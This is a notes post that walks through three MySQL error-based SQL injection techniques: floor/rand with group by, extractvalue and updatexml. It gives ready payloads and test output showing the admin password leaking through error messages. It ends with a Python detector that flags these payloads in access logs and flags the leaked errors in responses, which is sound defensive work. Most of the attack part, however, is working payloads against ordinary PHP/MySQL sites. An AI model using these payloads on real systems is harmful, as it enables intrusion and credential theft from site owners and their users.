Posting some of my old notes. When MySQL executes a statement it throws error messages, and PHP+MySQL sites often display that error text on the page, so the following three methods can be used to extract specific data.

Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a)

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));

Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version was successfully leaked in the error. To retrieve other data, replace the expression in the position where version() sits.

For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
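Added here as a defender's example, not part of the original notes: a small Python detector that flags the three error-based payload shapes from these notes in URL-decoded query strings, and separately flags the MySQL error text they depend on when it appears in a response body (the error disclosure that makes all three techniques work). The log lines are constructed, and the regexes and function names are my own.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the three error-based techniques shown above.
# Matched against the URL-decoded, lower-cased query string so that + / %20
# encoding does not hide the payload. Tune these to your own traffic.
REQUEST_SIGNATURES = {
    "floor_rand_groupby": re.compile(
        r"floor\s*\(\s*rand\s*\(.*group\s+by|group\s+by.*floor\s*\(\s*rand\s*\(", re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\("),
    "updatexml": re.compile(r"\bupdatexml\s*\("),
}

# Response-side signatures: the MySQL error text each technique produces. Seeing
# these in an HTTP response body means the app echoes database errors to clients.
RESPONSE_SIGNATURES = {
    "duplicate_group_key": re.compile(r"Duplicate entry '.*' for key 'group_key'"),
    "xpath_error": re.compile(r"XPATH syntax error: '"),
}
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def classify_request(query_string):
    """Return the names of the request signatures present in a query string."""
    decoded = unquote_plus(query_string).lower()
    return [name for name, rx in REQUEST_SIGNATURES.items() if rx.search(decoded)]

def classify_response(body):
    """Return the names of the leaked-error signatures present in a response body."""
    return [name for name, rx in RESPONSE_SIGNATURES.items() if rx.search(body)]

def scan_access_log(lines):
    """Yield (line_index, client_ip, hits) for access-log lines with a flagged query string."""
    for idx, line in enumerate(lines):
        m = REQUEST_LINE.search(line)
        if not m or "?" not in m.group(1):
            continue
        hits = classify_request(m.group(1).split("?", 1)[1])
        if hits:
            yield idx, line.split(" ", 1)[0], hits

# Constructed sample log, not captured traffic; payloads are the ones shown above.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /article.php?id=1+and+(select+1+from+(select+count(*),'
    'concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 233',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,'
    '(select%20pass%20from%20admin%20limit%201))) HTTP/1.1" 500 201',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /article.php?id=1%20and%201=(updatexml(1,concat(0x5e24,'
    '(select%20user()),0x5e24),1)) HTTP/1.1" 500 199',
]
```

Run `list(scan_access_log(SAMPLE_ACCESS_LOG))` to see the three flagged lines; the benign first line produces no hit. Suppressing the raw MySQL error text in responses removes the channel these three methods rely on, and `classify_response` is a quick check that it stays suppressed.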
All, thanks foreign guys.